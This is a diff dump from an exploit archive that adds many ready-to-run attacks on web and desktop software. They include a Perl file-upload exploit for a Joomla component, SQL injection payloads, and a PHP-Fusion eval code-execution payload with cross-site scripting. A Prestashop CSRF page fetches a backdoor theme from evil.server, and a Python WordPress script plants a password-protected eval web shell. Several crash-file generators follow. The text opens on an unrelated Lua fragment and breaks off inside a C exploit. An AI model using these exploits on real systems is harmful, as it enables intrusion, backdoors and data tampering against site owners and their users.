local cookiestr = string.match(strHead,"[cC]ookie:%s?(%s[^\r\n]*)")
if cookiestr == nil or cookiestr == "" then return end
string.gsub (cookiestr, "([^%s;=]+)=([^;=]*)[;%s]?",
function (key, val)
rawset(_COOKIE,unescape(key),unescape(val))
end
)
end
function setcookie(name,value,expire_secs)
if name == "UIDADMIN" then return end
local expiretime = os.date("!%A, %d-%b-%Y %H:%M:%S GMT",
os.time()+3600*24*365)
_SETCOOKIE = _SETCOOKIE.."Set-Cookie: "..name.."="..value..";
expires="..expiretime.."\r\n"
rawset(_COOKIE,name,value)
end
function getcookie(name)
if name == "UIDADMIN" then return end
return _COOKIE[name]
end
function deletecookie(name)
setcookie(name,"",-10000000)
end
function deleteallcookies()
for name,_ in pairs(_COOKIE) do
deletecookie(name)
end
end
local cookie_metatable =
{
__newindex = function(t,k,v)
setcookie(k,v,360000)
end
}
setmetatable(_COOKIE,cookie_metatable)
session_metatable =
{
__newindex = function(t,k,v)
if type(v) ~= "table" then
if k ~= nil then
k = string.gsub(k,"'","")
k = string.gsub(k,"\"","")
end
if v ~= nil then
--v = string.gsub(v,"%[","")
--v = string.gsub(v,"%]","")
end
rawset(_SESSION,k,v)
SessionModule.save(_SESSION_ID)
end
end
}
--setmetatable(_SESSION,session_metatable)
function init_all()
init_cookie()
init_session()
init_get()
init_post()
end
function setContentType(typestr)
_CONTENTTYPE = typestr
end
function exit()
error("exit function!")
end

23
exploits/php/webapps/48213.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Wordpress Plugin Custom Searchable Data System -
Unauthenticated Data modification
# Date: 13 March 2020
# Exploit Author: Nawaf Alkeraithe
# Vendor Homepage:
https://wordpress.org/plugins/custom-searchable-data-entry-system/
# Software Link:
https://wordpress.org/plugins/custom-searchable-data-entry-system/
# Version: 1.7.1
Plugin fails to perform authorization check to delete/add/edit data entries.
PoC (delete entry):
GET /wordpress/wp-admin/admin.php?page=sds-form-entries&sds-del-entry-first-entry-id=[ENTRY
ID1]&sds-del-entry-last-entry-id=[ENTRY
ID2]&sds-del-entry-table-row=wp_ghazale_sds_newtest_inputs
Note: plugin is not maintained now, either remove it, or apply the
authorization check to all actions.
Special thanks to *Wordfence and Sean Murphy!
(https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/
<https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/>)*

32
exploits/php/webapps/48222.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: UADMIN Botnet 1.0 - 'link' SQL Injection
# Google Dork: n/a
# Date: 2020-03-16
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: unkn0wn
# Version: unkn0wn
# Tested on: Windows 10, Kali
# CVE : n/a
################################
# Vuln-Code: download.php
$link=$_GET['link'];
$agent=esc__($_SERVER['HTTP_USER_AGENT']);
if(isset($_GET['botid'])){
$botid=esc__($_GET['botid']);
}else{
$botid='unknown';
};
################################
Attack Response & PoC:
---
Parameter: link (GET)
Type: time-based blind
Title: SQLite > 2.0 OR time-based blind (heavy query)
Payload: link=1' OR 7990=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- nwGY
---
http://127.0.0.1/ush/gates/token.php?link=1

191
exploits/php/webapps/48230.txt Normal file
View file

@ -0,0 +1,191 @@
# Exploit Title: Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload
# Google Dork: inurl:"index.php?option=com_acym"
# Date: 2020-03-16
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.acyba.com/
# Software Link: https://www.acyba.com/acymailing/download.html
# Version: v6.9.1 Starter
# Tested on: Joomla! v3.9.0
# CVE: N/A
########################################################################################
#Analysis of vulnerability
########################################################################################
Vulnerable code is in MailsController::setNewIconShare() in file "back/controllers/mails.php".
[BEGIN_CODE]
600 public function setNewIconShare()
601 {
602 $socialName = acym_getVar('string', 'social', '');
603 $extension = pathinfo($_FILES['file']['name']);
604 $newPath = ACYM_UPLOAD_FOLDER.'socials'.DS.$socialName;
605 $newPathComplete = $newPath.'.'.$extension['extension'];
606 //There code is no checking CSRF token, no sanitizing, and authentication.
607 if (!acym_uploadFile($_FILES['file']['tmp_name'], ACYM_ROOT.$newPathComplete) || empty($socialName)) { //!!!
608 echo 'error';
609 exit;
610 }
611
612 $newConfig = new stdClass();
613 $newConfig->social_icons = json_decode($this->config->get('social_icons', '{}'), true);
614
615 $newImg = acym_rootURI().$newPathComplete;
616 $newImgWithoutExtension = acym_rootURI().$newPath;
617
618 $newConfig->social_icons[$socialName] = $newImg;
619 $newConfig->social_icons = json_encode($newConfig->social_icons);
620 $this->config->save($newConfig);
621
622 echo json_encode(
623 [
624 'url' => $newImgWithoutExtension,
625 'extension' => $extension['extension'],
626 ]
627 );
628 exit;
629 }
function acym_uploadFile($src, $dest)
{
$dest = acym_cleanPath($dest);
$baseDir = dirname($dest);
if (!file_exists($baseDir)) {
acym_createFolder($baseDir);
}
if (is_writeable($baseDir) && move_uploaded_file($src, $dest)) {//!!!
if (@chmod($dest, octdec('0644'))) {
return true;
} else {
acym_enqueueMessage(acym_translation('ACYM_FILE_REJECTED_SAFETY_REASON'), 'error');
}
} else {
acym_enqueueMessage(acym_translation_sprintf('ACYM_COULD_NOT_UPLOAD_FILE_PERMISSION', $baseDir), 'error');
}
return false;
}
[END_CODE]
########################################################################################
#Exploit
########################################################################################
#!/usr/bin/perl
#
#$> perl ./exploit.pl "http://127.0.0.1/joomla" "lolz" /tmp/lolz.php
use strict;
use warnings;
use LWP::UserAgent;
use JSON(qw/decode_json/);
########################################################################################
sub print_usage_and_exit
{
print("*** com_acym Arbitrary File Upload exploit\n");
print("Usage: $0 <URL> <path_to_upload> <file_to_upload>\n");
print("\n");
exit();
}
sub fetch_useragent
{
my @available_useragents = (
"gertrud barkhorn",
"erica hartmann",
"eila ilmatar juutilainen",
);
return($available_useragents[(rand(scalar(@available_useragents)))]);
}
sub is_valid_url
{
my $given_url = shift(@_);
return 1 if ( $given_url =~ /^http(s)?:\/\// );
return 0;
}
sub do_die
{
my $errmsg = shift(@_);
printf("[!] %s\n", $errmsg);
exit();
}
sub get_base_path
{
return(sprintf("%s/index.php", $_[0]));
}
sub do_exploit
{
my %params = %{ shift(@_); };
my $ua = LWP::UserAgent->new(
"agent" => $params{"useragent"},
"timeout" => 360
);
print("[+] Trying to exploit ...\n");
print("[*] Sending POST request ...\n");
my $response = $ua->post(
get_base_path($params{"url"}),
"Content-Type" => "form-data",
"Accept-Language" => "zh-cn",
"Content" => {
"option" => "com_acym",
"ctrl" => "frontmails",
"task" => "setNewIconShare",
"social" => $params{"path"},
"file" => [ $params{"file"} ],
},
);
if ( $response->code == 200 )
{
my $j = decode_json($response->decoded_content);
my $f = sprintf("%s.%s",
$j->{"url"}, $j->{"extension"});
my $response = $ua->head($f);
printf("[\$] Uploaded file in %s\n", $f) if ( $response->code == 200 );
}
}
sub main
{
print_usage_and_exit() if ( scalar(@ARGV) < 2 );
my %params = (
"url" => $ARGV[0],
"path" => $ARGV[1],
"file" => $ARGV[2],
"useragent" => fetch_useragent());
do_die("Given invalid URL.") if ( !is_valid_url($ARGV[0]) );
do_die("Given invalid File.") if ( (!-e $ARGV[2]) or (stat($ARGV[2]))[7] == 0);
printf("[*] Parameters:\n");
while ( my ($k, $v) = each(%params) ) { printf("[+] %s => %s\n", $k, $v); }
printf("*" x50 . "\n");
while ( 1 )
{
printf("[?] Proceed(y/n)> ");
my $c = <STDIN>;
chomp($c);
if ( (length($c) == 1) and lc($c) eq "y" )
{
do_exploit(\%params);
last;
}
}
}
main();
########################################################################################

39
exploits/php/webapps/48238.txt Normal file
View file

@ -0,0 +1,39 @@
* Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload
* Google Dork: N/A
* Date: 2020.03.22
* Exploit Author: Milad Karimi
* Vendor Homepage: https://github.com/xiebruce/PicUploader
* Software Link: https://github.com/xiebruce/PicUploader
* Category : webapps
* Version: 1.0
* Tested on: windows 10 , firefox
* CVE : N/A
Vulnerable Source:
    88: move_uploaded_file move_uploaded_file($tmp_name, $dest))
    86: foreach($files['tmp_name'] as $key=>$tmp_name)
    80: $files = $_FILES['file']){
    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)),
    87: $dest = $tmpDir . '/' . $files['name'][$key];
    81: $tmpDir = APP_PATH . '/.tmp';
    24: define('APP_PATH', strtr(__DIR__, '\\', '/'));  // define()
    80: $files = $_FILES['file']){
    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)),
    80: if(isset($_FILES['file']) && $files = $_FILES['file'])
    84: if(is_array($files['tmp_name']))
Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/pluginsPicUploader-master/index.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/PicUploader/file.jpg

60
exploits/php/webapps/48278.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: PHP-Fusion 9.03.50 - 'panels.php' Multiple vulnerability
# Google Dork: N/A=20
# Date: 2020-04-01
# Exploit Author: Unkn0wn
# Vendor Homepage: https://www.php-fusion.co.uk
# Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php
# Version: 9.03.50
# Tested on: Ubuntu
# CVE : N/A
---------------------------------------------------------
Code Execution:
This vulnerabilty in "add_panel_form()" function.
in line 527 we can see "eval" tag:
*
eval("?>".stripslashes($_POST['panel_content'])."<?php ");
*
and to this funcation in line 528 - 530 return us payload:
*
$eval =3D ob_get_contents();
ob_end_clean();
echo $eval;
=09=09=09=09=09
*
Demo:
http://localhost/PHP-Fusion/files/administration/panels.php?aid=3Dae28e84e2=
2e900fb&section=3Dpanelform&action=3Dedit&panel_id=3D4
POST DATA:
fusion_token=3D1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583c=
f191c7dd30c2d99e9&form_id=3Dpanel_form&fusion_PmbaJ2=3D&panel_id=3D4&panel_=
name=3DWelcome Message&panel_filename=3Dnone&panel_side=3D2&panel_restricti=
on=3D2&panel_url_list=3D&panel_display=3D0&panel_content-insertimage=3D&pan=
el_content=3D;"Code Execution Payload"&panel_access=3D0&panel_languages[]=
=3DEnglish&panel_save=3DPreview Panel
----------------------------
Cross site-scripting:
In line 532 with POST DATA prin"t panel_content:
"
echo "<p>".nl2br(parse_textarea($_POST['panel_content'], FALSE, FALSE))."</=
p>\n";
"
Demo:
http://localhost/PHP-Fusion/files/administration/panels.php?aid=3Dae28e84e2=
2e900fb&section=3Dpanelform&action=3Dedit&panel_id=3D4
POST DATA:
fusion_token=3D1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583c=
f191c7dd30c2d99e9&form_id=3Dpanel_form&fusion_PmbaJ2=3D&panel_id=3D4&panel_=
name=3DWelcome Message&panel_filename=3Dnone&panel_side=3D2&panel_restricti=
on=3D2&panel_url_list=3D&panel_display=3D0&panel_content-insertimage=3D&pan=
el_content=3D;"<script>alert('Unkn0wn')</script>"&panel_access=3D0&panel_la=
nguages[]=3DEnglish&panel_save=3DPreview Panel
----------------------------------------------------------
# Contact : 0x9a@tuta.io
# Visit: https://t.me/l314XK205E
# @ 2010 - 2020
# Underground Researcher

30
exploits/php/webapps/48307.txt Normal file
View file

@ -0,0 +1,30 @@
Title: Helpful 2.4.11 Sql Injection - Wordpress Plugin
Version : 2.4.11
Software Link : https://wordpress.org/plugins/helpful/
Date of found: 10.04.2019
Author: Numan Türle
core/Core.class.php
// Ajax requests: pro
add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) );
// set args for insert command
$args = array(
'post_id' => $_REQUEST['post_id'],
'user' => $_REQUEST['user'],
'pro' => $_REQUEST['pro'],
'contra' => $_REQUEST['contra']
);
$result = $this->insert( $args );
@params = 'post_id' => $_REQUEST['post_id'],
call function insert -->
if( !$args['post_id'] ) return false;
$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id");
Payload :
GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1

121
exploits/php/webapps/48347.txt Normal file
View file

@ -0,0 +1,121 @@
<html>
<!--
# Exploit Title: Prestashop <= 1.7.6.4 single-click RCE exploit
# Date: 2020-04-11
# Exploit Author: Sivanesh Ashok | @sivaneshashok | stazot.com
# Vendor Homepage: https://www.prestashop.com/
# Version: 1.7.6.4 and below
# Tested on: Windows 10 / XAMPP / Prestashop v1.7.6.4
Prestashop <= 1.7.6.4 single-click RCE exploit
Written by Sivanesh Ashok | @sivaneshashok | stazot.com
For more details, visit https://stazot.com/prestashop-csrf-to-rce-article
Change the values of the 3 variables marked as "change this"
-->
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<h3>This is totally a legit page. Just keep reading this for a minute :)</h3>
<script>history.pushState('', '', '/')</script>
<script>
var target = "http://localhost"; //change this
var admin_url = "/admin123ab45cd"; //change this
var theme_url = "http://evil.server/backdoor-theme.zip"; //change this - link to the malicious theme zip file
var xhr0 = new XMLHttpRequest();
xhr0.open("GET", target+admin_url+"/filemanager/dialog.php");
xhr0.withCredentials = true;
xhr0.send();
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", target+admin_url+"/filemanager/upload.php", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------6487332036660663652470259777");
xhr.withCredentials = true;
var body = "-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path_thumb\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"exploit.svg\"\r\n" +
"Content-Type: image/svg+xml\r\n" +
"\r\n" +
"\x3csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\x3e\r\n" +
"\r\n" +
"\t\x3cscript xlink:href=\"https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js\"\x3e\x3c/script\x3e\r\n" +
"\t\r\n" +
"\t\x3cscript\x3e\r\n" +
"\t\r\n" +
"\t$.ajaxSetup({async: false});\r\n" +
"\r\n" +
"\tvar target = \'" + target + "\';\r\n" +
"\tvar admin_url = \'" + admin_url + "\';\r\n" +
"\tvar theme_url = \'" + theme_url + "\';\r\n" +
"\tvar import_url = \'\';\r\n" +
"\tvar import_token = \'\';\r\n" +
"\t\r\n" +
"\t$.get(target+admin_url+\'/index.php/improve/design/themes/import\', function( my_var0 ) {\r\n" +
"\t\r\n" +
"\t\tvar tmp = my_var0.match(/_token(.{44})/g);\r\n" +
"\t\ttmp = tmp.toString().split(\"=\");\r\n" +
"\t\ttmp = tmp[1];\r\n" +
"\t\timport_url = target+admin_url+\'/improve/design/themes/import?_token=\'+tmp;\r\n" +
"\r\n" +
"\t}, \'html\');\r\n" +
"\r\n" +
"\t$.get(import_url, function( my_var1 ) {\r\n" +
"\r\n" +
"\t\tvar tmp = my_var1.match(/import_theme__token(.{101})/g);\r\n" +
"\t\ttmp = tmp.toString().split(\' \');\r\n" +
"\t\ttmp = tmp[3].toString().split(\'=\\\"\');\r\n" +
"\t\timport_token = tmp[1];\r\n" +
"\r\n" +
"\t}, \'html\');\r\n" +
"\r\n" +
"\tvar themeUploadData = new FormData();\r\n" +
"\tthemeUploadData.append(\'import_theme[import_from_web]\', theme_url);\r\n" +
"\tthemeUploadData.append(\'import_theme[_token]\', import_token);\r\n" +
"\r\n" +
"\t$.ajax({\r\n" +
"\t\turl: import_url,\r\n" +
"\t\tdata: themeUploadData,\r\n" +
"\t\tcache: false,\r\n" +
"\t\tcontentType: false,\r\n" +
"\t\tprocessData: false,\r\n" +
"\t\tmethod: \'POST\'\r\n" +
"\t});\r\n" +
"\r\n" +
"\t\x3c/script\x3e\r\n" +
"\r\n" +
"\x3c/svg\x3e\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
window.setTimeout(function(){
submitRequest();
}, 1500);
window.setTimeout(function(){
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = target+"/img/cms/exploit.svg";
document.body.appendChild(iframe);
}, 4000);
</script>
</body>
</html>

95
exploits/php/webapps/48349.py Executable file
View file

@ -0,0 +1,95 @@
# Exploit Title: Wordpress Plugin Simple File List 5.4 - Remote Code Execution
# Date: 2020-04-2019
# Exploit Author: coiffeur
# Vendor Homepage: https://simplefilelist.com/
# Software Link: https://wordpress.org/plugins/simple-file-list/
# Version: Wordpress v5.4 Simple File List v4.2.2
import requests
import random
import hashlib
import sys
import os
import urllib3
urllib3.disable_warnings()
dir_path = '/wp-content/uploads/simple-file-list/'
upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'
def usage():
banner = """
NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE
SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL>
AUTHOR: coiffeur
"""
print(banner)
def generate():
filename = f'{random.randint(0, 10000)}.png'
password = hashlib.md5(bytearray(random.getrandbits(8)
for _ in range(20))).hexdigest()
with open(f'{filename}', 'wb') as f:
payload = '<?php if($_POST["password"]=="' + password + \
'"){eval($_POST["cmd"]);}else{echo "<title>404 Not Found</title><h1>Not Found</h1>";}?>'
f.write(payload.encode())
print(f'[ ] File {filename} generated with password: {password}')
return filename, password
def upload(url, filename):
files = {'file': (filename, open(filename, 'rb'), 'image/png')}
datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path,
'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'}
r = requests.post(url=f'{url}{upload_path}',
data=datas, files=files, verify=False)
r = requests.get(url=f'{url}{dir_path}{filename}', verify=False)
if r.status_code == 200:
print(f'[ ] File uploaded at {url}{dir_path}{filename}')
os.remove(filename)
else:
print(f'[*] Failed to upload {filename}')
exit(-1)
return filename
def move(url, filename):
new_filename = f'{filename.split(".")[0]}.php'
headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
'X-Requested-With': 'XMLHttpRequest'}
datas = {'eeSFL_ID': 1, 'eeFileOld': filename,
'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'}
r = requests.post(url=f'{url}{move_path}',
data=datas, headers=headers, verify=False)
if r.status_code == 200:
print(f'[ ] File moved to {url}{dir_path}{new_filename}')
else:
print(f'[*] Failed to move {filename}')
exit(-1)
return new_filename
def main(url):
file_to_upload, password = generate()
uploaded_file = upload(url, file_to_upload)
moved_file = move(url, uploaded_file)
if moved_file:
print(f'[+] Exploit seem to work.\n[*] Confirmning ...')
datas = {'password': password, 'cmd': 'phpinfo();'}
r = requests.post(url=f'{url}{dir_path}{moved_file}',
data=datas, verify=False)
if r.status_code == 200 and r.text.find('php') != -1:
print('[+] Exploit work !')
print(f'\tURL: {url}{dir_path}{moved_file}')
print(f'\tPassword: {password}')
if __name__ == "__main__":
if (len(sys.argv) < 2):
usage()
exit(-1)
main(sys.argv[1])

49
exploits/php/webapps/48374.txt Normal file
View file

@ -0,0 +1,49 @@
# Exploit Title: Library CMS Powerful Book Management System 2.2.0 - Session Fixation
# Date: 2020-04-22
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://kaasoft.pro/
# Software : https://codecanyon.net/item/library-cms-powerful-book-management-system/21105281
# Product Version: v2.2.0
# Product : Library CMS
# Vulernability Type : Broken Authentication
# Vulenrability : Session Fixation
# CVE : N/A
# Description :
Session Fixation vulnerability has been discovered in v2.2.0
version of Library CMS Powerful Book Management System.
Admin HTTP Request :
POST /admin/login HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://XXX.XXX.XXX.XXX/admin/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2
Upgrade-Insecure-Requests: 1
login=USERNAME&password=PASSWORD
Member HTTP Request :
POST /admin/login HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://XXX.XXX.XXX.XXX/admin/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close
Cookie: activeLanguage=en_US; PHPSESSID=nfj6gk1murk6jq47lpk5cv7qq6; activeLanguage=en_US; _ym_uid=1579299191562269050; _ym_d=1579299191; _ym_visorc_46947615=w; _ym_isad=2
Upgrade-Insecure-Requests: 1
login=USERNAME&password=PASSWORD

20
exploits/php/webapps/48605.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Exploit Author: Prof. Kailas PATIL (krp)
# Date: 2020-06-18
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
# Version: v1.0
# Category: Webapps
# Tested on: LAMP for Linux
# Description:
# Password and username parameters have sql injection vulnerability in Admin login panel.
#
#------------------------------------------------------
#
# Login Link: http://localhost/bpms/admin/index.php
# username: ' or '1'='1'#
# password: blah123
#
#------------------------------------------------------

27
exploits/watchos/dos/47404.pl Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service (DoS)
# Exploit Author: Emilio Revelo
# Date: 2019-09-20
# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe
# Tested on: Windows 10 Pro x64 es
# Steps to produce the DoS:
# 1.- Run perl script : perl SpotIE.pl
# 2.- Open SpotIE.txt and copy the content to clipboard
# 3.- Open SpotIE Internet Explorer Password Recovery
# 4.- Navigate to Register -> Enter the registration name and key below...
# 5.- Paste ClipBoard on "Key:"
# 7.- OK
# 8.- Crashed!!
#!/usr/local/bin/perl
use strict;
use warnings;
my $filename = 'SpotIE.txt';
open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";
print $fh "E"x256;
close $fh;
print "Done!\n";
print "File: SpotIE.txt\n"

30
exploits/watchos/dos/47406.py Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: InputMapper < 1.6.10 Local Denial of Service
# Date: 20.09.2019
# Vendor Homepage: https://inputmapper.com/
# Software Link: https://inputmapper.com/downloads/category/2-input-mapper
# Exploit Author: elkoyote07
# Tested Version: 1.6.10
# Tested on: Windows 10 x64
# 1.- Start Input Mapper
# 2.- Click on Guest (Top left)
# 3.- Click on Login
# 3.- Copy the content of exploit.txt in the Username field
# 4.- Once copied double-click on Username field
# 5.- Happy crash :)
#!/usr/bin/python
t = "A" * 15000
try:
f=open("exploit.txt","w")
f.write(t)
f.close()
print "Done"
except:
print "Error"

35
exploits/windows/dos/47393.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Notepad++ all x64 versions before 7.7. Remote memory corruption via .ml file.
# Google Dork: N/A
# Date: 2019-09-14
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://notepad-plus-plus.org/
# Version: < 7.7
# Tested on: Windows x64
# CVE : CVE-2019-16294
# Description:
SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file.
Open aaaaa.ml via affected notepad++
POC files:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47393.zip
Result:
(230.c64): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Notepad++\SciLexer.dll -
rax=00007ff8e64014c0 rbx=00000000000aaaaa rcx=00000000000aaaaa
rdx=0000000000000003 rsi=0000000000000000 rdi=00000000ffffffff
rip=00007ff8e63c071d rsp=000000aa06463d60 rbp=000000aa06463e81
r8=0000000000002fc8 r9=0000000000000000 r10=000000000000fde9
r11=000000aa06463d90 r12=0000000000000000 r13=0000000000000000
r14=0000000000000001 r15=0000000000000002
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
SciLexer!Scintilla_DirectFunction+0x950dd:
00007ff8e63c071d 0fb70458 movzx eax,word ptr [rax+rbx*2] ds:00007ff8e6556a14=????

26
exploits/windows/dos/47795.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
# Date: 2019-12-18
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://www.bimesoft.com/
# Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml
# Version: 2.2.0.103
# Tested on: Windows 7 SP1 (x86)
# Steps to reproduce:
# 1. Generate a malicious payload via the PoC
# 2. In the application set the 'Start Page URL' to any value, it doesn't matter.
# 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'.
# 4. Observe a program DOS crash, overwriting SEH=20
#!/usr/bin/python
payload =3D "A" * 382 + "B" * 4 + "C" * 4
try:
fileCreate =3Dopen("exploit.txt","w")
print("[x] Creating file")
fileCreate.write(payload)
fileCreate.close()
print("[x] File created")
except:
print("[!] File failed to be created")

21
exploits/windows/dos/47801.py Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title: XnConvert 1.82 - Denial of Service (PoC)
# Date: 2019-12-21
# Vendor Homepage: https://www.xnview.com
# Software Link: https://www.xnview.com/en/apps/
# Exploit Author: Gokkulraj (TwinTech Solutions)
# Tested Version: v1.82
# Tested on: Windows 7 x64
# 1.- Download and install XnConvert
# 2.- Run python code : XnConvert.py
# 3.- Open EVIL.txt and copy content to clipboard
# 4.- Open XnConvert and Click 'EnterKey'
# 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash.
#!/usr/bin/env python
Dos= "\x41" * 9000
myfile=open('Evil.txt','w')
myfile.writelines(Dos)
myfile.close()
print("File created")

33
exploits/windows/dos/47849.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install SpotFTP
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.SpotFTP Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

33
exploits/windows/dos/47872.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install SpotDialup
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.SpotDialup Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

135
exploits/windows/dos/47963.cpp Normal file
View file

@ -0,0 +1,135 @@
#include "BlueGate.h"
/*
EDB Note:
- Download (Source) ~
- Download (Binary) ~
*/
void error(const char* msg)
{
printf("ERROR: %s\n", msg);
exit(EXIT_FAILURE);
}
void SOCKInit()
{
WSADATA wsaData;
int res;
res = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (res != 0)
error("WSAStartup failed");
}
void DTLSInit()
{
SSL_library_init();
SSL_load_error_strings();
ERR_load_BIO_strings();
OpenSSL_add_all_algorithms();
}
int OpenUDPConnection(const char* hostname, int port)
{
int sockfd;
sockaddr_in addr;
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd < 0)
error("Failed to open socket");
